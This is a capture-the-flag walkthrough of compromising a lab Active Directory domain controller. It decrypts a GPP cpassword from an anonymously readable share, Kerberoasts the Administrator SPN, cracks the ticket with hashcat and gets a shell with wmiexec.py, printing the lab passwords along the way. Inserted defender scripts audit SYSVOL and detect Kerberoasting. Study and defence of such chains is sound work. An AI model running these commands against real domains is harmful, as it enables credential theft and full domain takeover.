Machine Overview
The target machine is a Windows Server Active Directory Domain Controller. Initial access is obtained through anonymous SMB access to the Replication share, which contains Group Policy Preferences (GPP) files with encrypted credentials. After decrypting the GPP password, we authenticate as the SVC_TGS service account. Privilege escalation is achieved via Kerberoasting, where we request service tickets for the Administrator account's Service Principal Name (SPN) and crack the resulting Kerberos ticket to obtain the Administrator password.
Enumeration
Nmap Scan
We begin with a service scan to enumerate open ports:
nmap -A -oN nmap.txt 10.10.10.100
Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-03 07:10:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-11-03T07:10:58
|_ start_date: 2025-11-03T07:05:04
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
Findings:
- Port 53 (DNS): Active Directory DNS service
- Port 88 (Kerberos): Authentication service
- Port 389/636 (LDAP): Active Directory LDAP services
- Port 445 (SMB): File sharing service
- Domain: active.htb
- Hostname: DC (Domain Controller)
- OS: Windows Server 2008 R2 SP1
SMB Enumeration
We attempt to list SMB shares with anonymous access:
smbclient -L //10.10.10.100 -N
Results:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
SMB Share Access
Using smbmap, we check the permissions on each share:
$ smbmap -H 10.10.10.100
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connections
The Replication share has READ ONLY access. We can connect to it and browse its contents:
smbclient //10.10.10.100/Replication -N
Navigating through the directory structure, we find the active.htb domain folder. Within \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\, we discover a Groups.xml file.
This file is a Group Policy Preferences (GPP) item. GPP historically stored account passwords in the cpassword attribute, AES-encrypted with a fixed key that Microsoft itself published, so anyone who can read the file can decrypt them.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
The Groups.xml file contains credentials for the SVC_TGS user. The cpassword attribute holds the encrypted password, which can be decrypted with the publicly known AES key Microsoft used for GPP encryption.
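As an added defender-side example (not from this write-up and not gpp-decrypt's code), the following script audits a SYSVOL tree for GPP files that still carry a cpassword attribute, which is exactly what made the Groups.xml above exploitable. Microsoft's 2014 update stopped new cpasswords from being written, but existing files stay in SYSVOL until someone removes them, and every file name in GPP_FILES can carry one. The sample Groups.xml, its GUID and its account are constructed placeholders; the script reports the finding and deliberately does not decrypt it.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files whose <Properties> element may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Constructed sample: placeholder GUID, account and (meaningless) cpassword value.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000000}">
  <User name="example.local\\svc_demo" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="QUJDREVGR0g=" userName="example.local\\svc_demo"/>
  </User>
</Groups>
"""


def find_cpasswords(sysvol_root):
    """Walk a SYSVOL tree; return (relative path, item tag, account, cpassword) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed XML: a real audit would log this as well
            for item in root:  # each <User>, <Group>, <Service>, <Drive>, ... entry
                props = item.find("Properties")
                cp = props.get("cpassword") if props is not None else None
                if not cp:
                    continue
                account = (props.get("userName") or props.get("accountName")
                           or props.get("runAs") or item.get("name", ""))
                findings.append((os.path.relpath(path, sysvol_root), item.tag, account, cp))
    return findings


def demo():
    """Write the constructed Groups.xml into a temporary SYSVOL-like tree and audit it."""
    with tempfile.TemporaryDirectory() as sysvol:
        gpo_dir = os.path.join(sysvol, "example.local", "Policies",
                               "{00000000-0000-0000-0000-000000000000}",
                               "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo_dir)
        with open(os.path.join(gpo_dir, "Groups.xml"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_GROUPS_XML)
        return find_cpasswords(sysvol)
```

Each finding is a preference item to delete from the GPO, followed by a password rotation for the account it names, since the value may already have been read by anyone with SYSVOL access.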
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Using gpp-decrypt (or gpp-decrypt.py), we can decrypt this password:
$ gpp-decrypt.py -f Groups.xml
[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18
Authenticating with SVC_TGS Credentials
With the decrypted credentials, we can now authenticate to the domain controller as the SVC_TGS service account:
smbmap -u SVC_TGS -p 'GPPstillStandingStrong2k18' -H 10.10.10.100
Results:
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We now have read access to the Users share. We can connect to it and retrieve the user flag:
smbclient //10.10.10.100/Users -U SVC_TGS
User flag
smb:\SVC_TGS\Desktop\user.txt
Privilege Escalation
Kerberoasting
With valid domain credentials for the SVC_TGS service account, we can perform a Kerberoasting attack. This technique involves requesting Kerberos service tickets for accounts with Service Principal Names (SPNs) and then attempting to crack the encrypted tickets offline.
Using Impacket's GetUserSPNs.py, we enumerate accounts with SPNs and request their service tickets:
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -outputfile spn.txt
What is Kerberoasting?
Kerberoasting is an attack technique where an attacker requests service tickets from Active Directory for accounts that have Service Principal Names (SPNs) configured. Each ticket is encrypted with a key derived from the service account's password (for RC4 tickets, the account's NT hash), so it can be brute-forced offline without further contact with the domain controller. The attack is particularly effective because any authenticated domain user can request service tickets for accounts with SPNs.
Results:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2025-11-03 08:06:11.140954
The output shows that the Administrator account has an SPN configured (active/CIFS:445). The tool automatically requests a service ticket for this account and saves it to spn.txt in a format suitable for password cracking.
Cracking the Kerberos Ticket
We use hashcat to crack the Kerberos ticket hash (mode 13100 for Kerberos 5 TGS-REP etype 23):
hashcat -m 13100 spn.txt /usr/share/wordlists/rockyou.txt --force
Results:
$krb5tgs$...:Ticketmaster1968:Ticketmaster1968
Hashcat successfully cracked the password Ticketmaster1968 for the Administrator user.
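As an added defender-side example (not part of this write-up), this is the detection logic for the trace that the GetUserSPNs.py step above leaves on the domain controller: Security event 4769 (service ticket requested) with ticket encryption type 0x17, i.e. RC4, the etype 23 that hashcat mode 13100 cracks, for a user account that has an SPN. The log records are constructed in a flattened key=value form, with field names taken from the 4769 EventData; the account names, hosts and addresses are placeholders.

```python
from collections import defaultdict

# Constructed sample records (not real log data). Field names follow the
# Security event 4769 EventData; one 4768 (TGT request) is included as noise.
SAMPLE_4769 = """\
EventID=4769 TargetUserName=svc_demo@EXAMPLE.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.25
EventID=4769 TargetUserName=svc_demo@EXAMPLE.LOCAL ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.25
EventID=4769 TargetUserName=svc_demo@EXAMPLE.LOCAL ServiceName=sqlsvc TicketEncryptionType=0x17 Status=0x0 IpAddress=10.0.0.25
EventID=4769 TargetUserName=jdoe@EXAMPLE.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.40
EventID=4768 TargetUserName=jdoe@EXAMPLE.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.0.0.40
EventID=4769 TargetUserName=jdoe@EXAMPLE.LOCAL ServiceName=Administrator TicketEncryptionType=0x17 Status=0x1f IpAddress=10.0.0.40
"""

RC4_HMAC = 0x17  # etype 23: the ticket type that hashcat mode 13100 attacks


def parse(log_text):
    """Split flattened key=value records into one dict per event."""
    return [dict(tok.split("=", 1) for tok in line.split())
            for line in log_text.splitlines() if line.strip()]


def is_roastable_request(ev):
    """True for a successful TGS request for a user service account, encrypted with RC4."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False  # only a successful request yields a ticket that can be cracked
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # machine accounts and the KDC itself are not Kerberoast targets
    return int(ev.get("TicketEncryptionType", "0x0"), 16) == RC4_HMAC


def kerberoast_candidates(log_text, min_services=1):
    """Group suspicious requests by (requesting account, client IP).

    Returns {(account, ip): [service names]} for groups with at least
    min_services distinct services. On a domain where RC4 is still routinely
    negotiated (as on the 2008 R2 target here) a single RC4 ticket is weak
    evidence; many distinct SPNs from one client in a short window is the
    stronger signal, so raise min_services to cut noise.
    """
    hits = defaultdict(set)
    for ev in parse(log_text):
        if is_roastable_request(ev):
            hits[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_services}


if __name__ == "__main__":
    for (account, ip), services in kerberoast_candidates(SAMPLE_4769).items():
        print(f"[!] {account} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

The complement is prevention: no SPN on privileged accounts such as Administrator, long random passwords or group managed service accounts for SPN accounts, and AES-only Kerberos encryption so that RC4 tickets stop appearing at all.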
Accessing as Administrator
With the Administrator credentials, we can authenticate and obtain a shell using Impacket's wmiexec.py:
$ wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
C:\> whoami
active\administrator
We now have a shell running as the Administrator user with full system privileges.
Root flag
C:\Users\Administrator\Desktop\root.txt